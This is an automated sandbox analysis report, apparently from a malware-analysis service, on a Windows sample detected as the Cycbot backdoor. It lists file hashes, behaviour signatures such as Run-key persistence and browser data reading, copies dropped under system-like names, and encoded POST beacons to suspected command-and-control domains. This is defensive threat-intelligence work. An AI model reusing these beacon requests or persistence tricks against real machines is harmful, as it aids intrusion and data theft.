Analysis

  • max time kernel
    140s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    14/01/2025, 23:16 UTC

General

  • Target

    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe

  • Size

    155KB

  • MD5

    479ea8b11346420de25822a11bcd87f6

  • SHA1

    ac90a938fd1e3433167f7ebbed91093433299d0d

  • SHA256

    6f617912ffd5ebe4c38bd0b94ddc8d068f87f576ffcc5f806bf5c17b43996a3b

  • SHA512

    f7726abf85d180b1101d6f91735a878ba8102ac66da87f9324b53fa6f6b22b41b86071ec78f19ae3c55a8af954b8f417f7a1773946a3c9450ddafc90cea13587

  • SSDEEP

    3072:6pfbUSOAOmhjliEjsbT0771y3cE7dxNHinaYnodyJXw8XYrwclwEBm:KROAO9Ejc871WdTHinaEoOFXYrwr8m

Malware Config

Signatures

  • Cycbot

    Cycbot is a backdoor and trojan written in C++..

  • Cycbot family
  • Detects Cycbot payload 5 IoCs

    Cycbot is a backdoor and trojan written in C++.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe"
    1⤵
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2376
    • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
      C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe startC:\Users\Admin\AppData\Roaming\dwm.exe%C:\Users\Admin\AppData\Roaming
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2080
    • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
      C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe startC:\Users\Admin\AppData\Local\Temp\csrss.exe%C:\Users\Admin\AppData\Local\Temp
      2⤵
      • System Location Discovery: System Language Discovery
      PID:624

Network

  • flag-us
    DNS
    onlinedatingsecretfriends.com
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    Remote address:
    8.8.8.8:53
    Request
    onlinedatingsecretfriends.com
    IN A
    Response
  • flag-us
    DNS
    searchmobilecode.com
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    Remote address:
    8.8.8.8:53
    Request
    searchmobilecode.com
    IN A
    Response
  • flag-us
    DNS
    zonetf.com
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    Remote address:
    8.8.8.8:53
    Request
    zonetf.com
    IN A
    Response
    zonetf.com
    IN A
    76.223.54.146
    zonetf.com
    IN A
    13.248.169.48
  • flag-us
    DNS
    zonetf.com
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    Remote address:
    8.8.8.8:53
    Request
    zonetf.com
    IN A
    Response
    zonetf.com
    IN A
    76.223.54.146
    zonetf.com
    IN A
    13.248.169.48
  • flag-us
    DNS
    extremerollerclub.com
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    Remote address:
    8.8.8.8:53
    Request
    extremerollerclub.com
    IN A
    Response
  • flag-us
    POST
    http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    Remote address:
    76.223.54.146:80
    Request
    POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
    Host: zonetf.com
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Content-Length: 0
    Connection: close
    Response
    HTTP/1.1 405 Method Not Allowed
    content-length: 0
    connection: close
  • flag-us
    POST
    http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    Remote address:
    76.223.54.146:80
    Request
    POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
    Host: zonetf.com
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Content-Length: 0
    Connection: close
    Response
    HTTP/1.1 405 Method Not Allowed
    content-length: 0
    connection: close
  • flag-us
    POST
    http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    Remote address:
    76.223.54.146:80
    Request
    POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D HTTP/1.1
    Host: zonetf.com
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Content-Length: 0
    Connection: close
    Response
    HTTP/1.1 405 Method Not Allowed
    content-length: 0
    connection: close
  • flag-us
    POST
    http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2Bsq1Sr%2Fe%2BV5ZuRg%3D%3D
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    Remote address:
    76.223.54.146:80
    Request
    POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2Bsq1Sr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
    Host: zonetf.com
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Content-Length: 0
    Connection: close
    Response
    HTTP/1.1 405 Method Not Allowed
    content-length: 0
    connection: close
  • flag-us
    POST
    http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8CiYvEaSvT%2Bsqli8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    Remote address:
    76.223.54.146:80
    Request
    POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8CiYvEaSvT%2Bsqli8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
    Host: zonetf.com
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Content-Length: 0
    Connection: close
    Response
    HTTP/1.1 405 Method Not Allowed
    content-length: 0
    connection: close
  • flag-us
    DNS
    www.google.com
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    Remote address:
    8.8.8.8:53
    Request
    www.google.com
    IN A
    Response
    www.google.com
    IN A
    142.250.187.196
  • flag-gb
    GET
    http://www.google.com/
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    Remote address:
    142.250.187.196:80
    Request
    GET / HTTP/1.0
    Connection: close
    Host: www.google.com
    Accept: */*
    Response
    HTTP/1.0 302 Found
    Location: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGKnhm7wGIjAX66p0pAtsapVV56LvnKh0prmP57wTozh0EyKtXm5HGWLPSL9qVaM2F9oGf8CSUpkyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
    x-hallmonitor-challenge: CgwIqeGbvAYQy4r9zQMSBLXXsFM
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-3BrZTL7tnud9wHxZXfFO-A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
    Date: Tue, 14 Jan 2025 23:18:01 GMT
    Server: gws
    Content-Length: 396
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Set-Cookie: AEC=AZ6Zc-VVCM62OsYGdPK1p9EYYRdUQBikLXZxSNNIeJcJh4Eq3uhGflhmTg; expires=Sun, 13-Jul-2025 23:18:01 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
  • flag-us
    DNS
    hostinganddedic.com
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    Remote address:
    8.8.8.8:53
    Request
    hostinganddedic.com
    IN A
    Response
  • flag-gb
    GET
    http://www.google.com/
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    Remote address:
    142.250.187.196:80
    Request
    GET / HTTP/1.1
    Connection: close
    Pragma: no-cache
    Host: www.google.com
    Response
    HTTP/1.1 302 Found
    Location: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGKrhm7wGIjAD9f3ziWVBbZXm3dwQZYFN9l0sbrFDWEBEpiY_8Z9sZ0uj8jT_GrL4LNgDodsKZV4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
    x-hallmonitor-challenge: CgwIquGbvAYQxJuBygESBLXXsFM
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-CxCAaOmDt3QbncaDKu3pIg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
    Date: Tue, 14 Jan 2025 23:18:02 GMT
    Server: gws
    Content-Length: 396
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Set-Cookie: AEC=AZ6Zc-XvMjDvxONR28PNcfRGOFGe6OkeQFeLCx7_1VAHu5YLOzGjI7d_wA; expires=Sun, 13-Jul-2025 23:18:02 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
    Connection: close
  • flag-gb
    GET
    http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGKrhm7wGIjAD9f3ziWVBbZXm3dwQZYFN9l0sbrFDWEBEpiY_8Z9sZ0uj8jT_GrL4LNgDodsKZV4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    Remote address:
    142.250.187.196:80
    Request
    GET /sorry/index?continue=http://www.google.com/&q=EgS117BTGKrhm7wGIjAD9f3ziWVBbZXm3dwQZYFN9l0sbrFDWEBEpiY_8Z9sZ0uj8jT_GrL4LNgDodsKZV4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
    Connection: close
    Pragma: no-cache
    Host: www.google.com
    Response
    HTTP/1.1 429 Too Many Requests
    Date: Tue, 14 Jan 2025 23:18:02 GMT
    Pragma: no-cache
    Expires: Fri, 01 Jan 1990 00:00:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Content-Type: text/html
    Server: HTTP server (unknown)
    Content-Length: 3075
    X-XSS-Protection: 0
    Connection: close
  • 76.223.54.146:80
    http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
    http
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    581 B
    245 B
    5
    4

    HTTP Request

    POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D

    HTTP Response

    405
  • 76.223.54.146:80
    http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
    http
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    581 B
    245 B
    5
    4

    HTTP Request

    POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D

    HTTP Response

    405
  • 76.223.54.146:80
    http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
    http
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    609 B
    325 B
    6
    6

    HTTP Request

    POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D

    HTTP Response

    405
  • 76.223.54.146:80
    http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2Bsq1Sr%2Fe%2BV5ZuRg%3D%3D
    http
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    627 B
    325 B
    6
    6

    HTTP Request

    POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2Bsq1Sr%2Fe%2BV5ZuRg%3D%3D

    HTTP Response

    405
  • 76.223.54.146:80
    http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8CiYvEaSvT%2Bsqli8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D
    http
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    641 B
    245 B
    6
    4

    HTTP Request

    POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8CiYvEaSvT%2Bsqli8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D

    HTTP Response

    405
  • 142.250.187.196:80
    http://www.google.com/
    http
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    348 B
    1.5kB
    6
    5

    HTTP Request

    GET http://www.google.com/

    HTTP Response

    302
  • 127.0.0.1:62263
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
  • 142.250.187.196:80
    http://www.google.com/
    http
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    307 B
    1.5kB
    5
    5

    HTTP Request

    GET http://www.google.com/

    HTTP Response

    302
  • 142.250.187.196:80
    http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGKrhm7wGIjAD9f3ziWVBbZXm3dwQZYFN9l0sbrFDWEBEpiY_8Z9sZ0uj8jT_GrL4LNgDodsKZV4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
    http
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    526 B
    3.7kB
    6
    7

    HTTP Request

    GET http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGKrhm7wGIjAD9f3ziWVBbZXm3dwQZYFN9l0sbrFDWEBEpiY_8Z9sZ0uj8jT_GrL4LNgDodsKZV4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

    HTTP Response

    429
  • 127.0.0.1:62263
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
  • 8.8.8.8:53
    onlinedatingsecretfriends.com
    dns
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    75 B
    75 B
    1
    1

    DNS Request

    onlinedatingsecretfriends.com

  • 8.8.8.8:53
    searchmobilecode.com
    dns
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    66 B
    139 B
    1
    1

    DNS Request

    searchmobilecode.com

  • 8.8.8.8:53
    zonetf.com
    dns
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    56 B
    88 B
    1
    1

    DNS Request

    zonetf.com

    DNS Response

    76.223.54.146
    13.248.169.48

  • 8.8.8.8:53
    zonetf.com
    dns
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    56 B
    88 B
    1
    1

    DNS Request

    zonetf.com

    DNS Response

    76.223.54.146
    13.248.169.48

  • 8.8.8.8:53
    extremerollerclub.com
    dns
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    67 B
    140 B
    1
    1

    DNS Request

    extremerollerclub.com

  • 8.8.8.8:53
    www.google.com
    dns
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    60 B
    76 B
    1
    1

    DNS Request

    www.google.com

    DNS Response

    142.250.187.196

  • 8.8.8.8:53
    hostinganddedic.com
    dns
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    65 B
    138 B
    1
    1

    DNS Request

    hostinganddedic.com

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\8264.3A1

    Filesize

    1KB

    MD5

    5c51f593002a6dcc1b630dab9154ca24

    SHA1

    9cd3f31acd7ff3acca132f9aa4563435c1b53868

    SHA256

    8784117ca15b6d0c63e057f3003aa88e2a7ca62dc981a856614b6d82111e76ae

    SHA512

    c896ec1ac8025c02d6bb34b1477e8239500fce8bcde7f633727f113da23366e1e9dea66cfe48000fa565f79a165d788858766cbc5805422418520ea3b83b4f90

  • C:\Users\Admin\AppData\Roaming\8264.3A1

    Filesize

    1KB

    MD5

    4ff11f92482e9ae3b56069f69e0b299f

    SHA1

    fe96dfb674ca339348ea1a69c406f832e970a7d8

    SHA256

    ac6d0c8326efdfe270cfd4fb3da1b0472cfd89d3443777583f242ee0ef0b0fdc

    SHA512

    1723220769f11e42d94cb7ec40dcf9faa109b4888f337106d1c6a3f8adada22a87e04dfd9b1590a3450c48cf8697fd977e45aa6cdb114ebd4b311da3d8e30bb6

  • C:\Users\Admin\AppData\Roaming\8264.3A1

    Filesize

    600B

    MD5

    5f358409ef0005b3c60a004a71447f78

    SHA1

    f4877d50b1c2e9774c5c7a705d0ac46fe1470f28

    SHA256

    cefb78b32558f8f5fbfb6bf3e842f161d68d6177241188a735776f54176bb415

    SHA512

    478e6aeee61adcb05a28e0ad6d1a06374e23641bccc8db5c322cc451f55cb95853ca579bef8d5b2d4e2ad8f3da5e26cc83caa3441d7e3392f07a90227f1e0127

  • C:\Users\Admin\AppData\Roaming\8264.3A1

    Filesize

    996B

    MD5

    1b948209056bc1a51ad2a18875e1f820

    SHA1

    e672588e9bbcd5aa7c68e2fca59c8b271276996d

    SHA256

    2dd09ba02a439e7e799cfbc8f9a30d142dc0194a29ef03d45a1a55d48b81cb4e

    SHA512

    68f0e49f80b273bdbf7075ae213503b3003e6ec6694df59754ea072501823b008d7b252e3c01ae9351835360999ea15578d85e52eaa574ffea41dee7c65fd2e1

  • memory/624-78-0x0000000000400000-0x0000000000442000-memory.dmp

    Filesize

    264KB

  • memory/2080-6-0x0000000000400000-0x0000000000442000-memory.dmp

    Filesize

    264KB

  • memory/2080-5-0x0000000000400000-0x0000000000442000-memory.dmp

    Filesize

    264KB

  • memory/2376-1-0x0000000000400000-0x0000000000442000-memory.dmp

    Filesize

    264KB

  • memory/2376-2-0x0000000000400000-0x0000000000442000-memory.dmp

    Filesize

    264KB

  • memory/2376-14-0x0000000000400000-0x0000000000442000-memory.dmp

    Filesize

    264KB

  • memory/2376-75-0x0000000000400000-0x0000000000442000-memory.dmp

    Filesize

    264KB

  • memory/2376-185-0x0000000000400000-0x0000000000442000-memory.dmp

    Filesize

    264KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.